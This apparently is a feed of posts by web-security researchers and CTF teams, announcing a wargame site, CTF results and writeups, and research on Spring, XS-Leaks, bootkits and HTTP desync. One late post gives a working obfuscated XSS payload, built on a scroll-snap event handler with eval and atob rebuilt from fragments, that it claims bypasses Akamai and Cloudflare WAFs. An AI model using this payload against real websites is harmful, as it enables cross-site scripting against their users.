UNSTOPPABLE!!!

Hello! We’ve just launched a new wargame site called damn vulnerable web! It consists only of web challenges, primarily designed for intermediate to advanced players rather than beginners. We hope this wargame helps more people gain deeper and broader knowledge in web hacking :) For now, we’re planning to accept only 300 users initially for open beta testing and capacity checks. Starting from this tweet, we’ll gradually increase the number of allowed sign-ups each week. Your interest and support will be a huge help to our future activities We’ll do our best to deliver even better work going forward. Thank you! Wargame site: wargame.rewritelab.org Join our Discord: discord.gg/wYAm2n4M4J

SECCON 14 Quals WEB Writeup :)

3rd in RubiyaLab ☆☆

This weekend, I participated in @cykorctf under the name of @ everyone and placed 6th. And my teammate succeeded in first-blood and everyone injection was successfully performed! 🩸

We have successfully published our third research! This research focuses on diving deep into the Spring framework. Spring is an important framework used by many companies. However, since the Spring framework doesn't frequently appear in challenges, we expect many people are unfamiliar with it Through this research, we conducted an in-depth study of the Spring framework centered on case studies - what the Spring framework is and what actual bug cases have occurred. We hope it receives a lot of interest! : )

We have published a new article! You can check out the research in both Korean and English versions below :) This article is not research, but a complete writeup of the web challenges from the CODEGATE 2025 final round. We have organized it in as much detail as possible so that you can understand the core concepts even without code comprehension of the challenges We will show more activities going forward. Please show us lots of interest and look forward to it! We deeply appreciate @goldleo01 and @Predic02 for their hard work in writing the writeup

research.rewritelab.org/2025… 2025 코드게이트 writeup 작성했습니다! 즐감하세용

Our Bootkitty team will announcing "A Stealthy Bootkit-Rootkit Against Modern Operating Systems" soon at USENIX WOOT25. Stay tuned for upcoming presentation. Credit: @B1ack3at, @jihoonab151, HyunA Seo, @Iranu96, @wh1te4ever, Jinho Jung, Hyungjoon Koo. usenix.org/conference/woot25…

Black Hat USA 2025 slides github.com/onhexgroup/Confer…

Hello Vegas! x.com/Predic02/status/195333…

My XS-Leaks Resarch Post is uploaded! enjoy it! [KR/ENG] research.rewritelab.org/arti…

Upstream HTTP/1.1 is inherently insecure and consistently exposes millions of websites to hostile takeover. Six years after we exposed the threat of HTTP desync attacks, there's still no end in sight. On August 6, at Black Hat USA, James Kettle from PortSwigger Research will reveal new classes of desync attack that enabled him to compromise multiple CDNs and kick off the desync endgame. Follow @PortSwigger for the full reveal! More info 👇 http1mustdie.com/

Hi busan

I participated @CODEGATE_KR as a member of @rubiyalab

Ahoy!! we got 2nd place at GPN CTF 2025! GG! @KITCTF

I just found a WAF bypass for Akamai and Cloudflare: <address onscrollsnapchange=window['ev' 'a' (['l','b','c'][0])](window['a' 'to' (['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>

Can’t make this up, my in-flight tv is already hacked on the way to defcon